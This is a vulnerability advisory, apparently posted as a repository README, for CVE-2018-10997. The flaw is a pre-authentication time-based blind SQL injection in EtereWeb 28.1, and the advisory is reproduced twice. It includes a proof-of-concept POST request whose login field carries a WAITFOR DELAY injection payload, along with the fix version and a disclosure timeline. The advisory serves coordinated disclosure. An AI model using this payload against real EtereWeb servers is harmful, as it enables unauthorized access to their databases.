dmblbc/eteresqli

## eteresqli
Technicolor Security Office - Vulnerability Advisory
#######################################################################
#Title: Time-Based Blind SQL-Injection
#Product: Etere Web
#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx
#Vulnerable versions: Etere Web 28.1
#CVE: CVE-2018-10997
#Impact: critical
#Discoverer: Dion Bellemare
#######################################################################
-----------------------------------------------------------------------

[Description]
EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.

-----------------------------------------------------------------------

[Vendor of Product]
Etere Pte Ltd

-----------------------------------------------------------------------

[Affected Product Code Base]
EtereWeb - 28.1

-----------------------------------------------------------------------

[Attack Type]
Remote

-----------------------------------------------------------------------

[Impact Information Disclosure]
true

-----------------------------------------------------------------------

[CVE Impact Other]
An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control.

-----------------------------------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]
true

-----------------------------------------------------------------------

[Proof Of Concept]
Target: http://etere.example.com/etereweb/
Target Parameters: txUserName (POST)
Target Parameters: txPassword (POST)

POST /etereweb/ HTTP/1.1
Host: etere.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://etere.example.com/etereweb/
Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 750

txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser=

-----------------------------------------------------------------------

[Solution]
Upgrade EtereWeb to version 28.1.20 or greater

-----------------------------------------------------------------------


[Advisory History]
2018-05-02 - Initial discovery and write-up of vuln advisory
2018-05-02 - Sent notification email to Etere contact
2018-05-03 - Received initial response from Etere
2018-05-08 - Sent email to suggest using PGP to encrypt email
2018-05-29 - Additional details of vuln provided to Etere
2018-05-31 - Etere responds that vuln is fixed in version 28.1.20

-----------------------------------------------------------------------

[Discoverer]
Dion Bellemare
	Technicolor Security Office - Vulnerability Advisory
	#######################################################################
	#Title: Time-Based Blind SQL-Injection
	#Product: Etere Web
	#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx
	#Vulnerable versions: Etere Web 28.1
	#CVE: CVE-2018-10997
	#Impact: critical
	#Discoverer: Dion Bellemare
	#######################################################################
	-----------------------------------------------------------------------

	[Description]
	EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.

	-----------------------------------------------------------------------

	[Vendor of Product]
	Etere Pte Ltd

	-----------------------------------------------------------------------

	[Affected Product Code Base]
	EtereWeb - 28.1

	-----------------------------------------------------------------------

	[Attack Type]
	Remote

	-----------------------------------------------------------------------

	[Impact Information Disclosure]
	true

	-----------------------------------------------------------------------

	[CVE Impact Other]
	An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control.

	-----------------------------------------------------------------------

	[Has vendor confirmed or acknowledged the vulnerability?]
	true

	-----------------------------------------------------------------------

	[Proof Of Concept]
	Target: http://etere.example.com/etereweb/
	Target Parameters: txUserName (POST)
	Target Parameters: txPassword (POST)

	POST /etereweb/ HTTP/1.1
	Host: etere.example.com
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://etere.example.com/etereweb/
	Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 750

	txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser=

	-----------------------------------------------------------------------

	[Solution]
	Upgrade EtereWeb to version 28.1.20 or greater

	-----------------------------------------------------------------------


	[Advisory History]
	2018-05-02 - Initial discovery and write-up of vuln advisory
	2018-05-02 - Sent notification email to Etere contact
	2018-05-03 - Received initial response from Etere
	2018-05-08 - Sent email to suggest using PGP to encrypt email
	2018-05-29 - Additional details of vuln provided to Etere
	2018-05-31 - Etere responds that vuln is fixed in version 28.1.20

	-----------------------------------------------------------------------

	[Discoverer]
	Dion Bellemare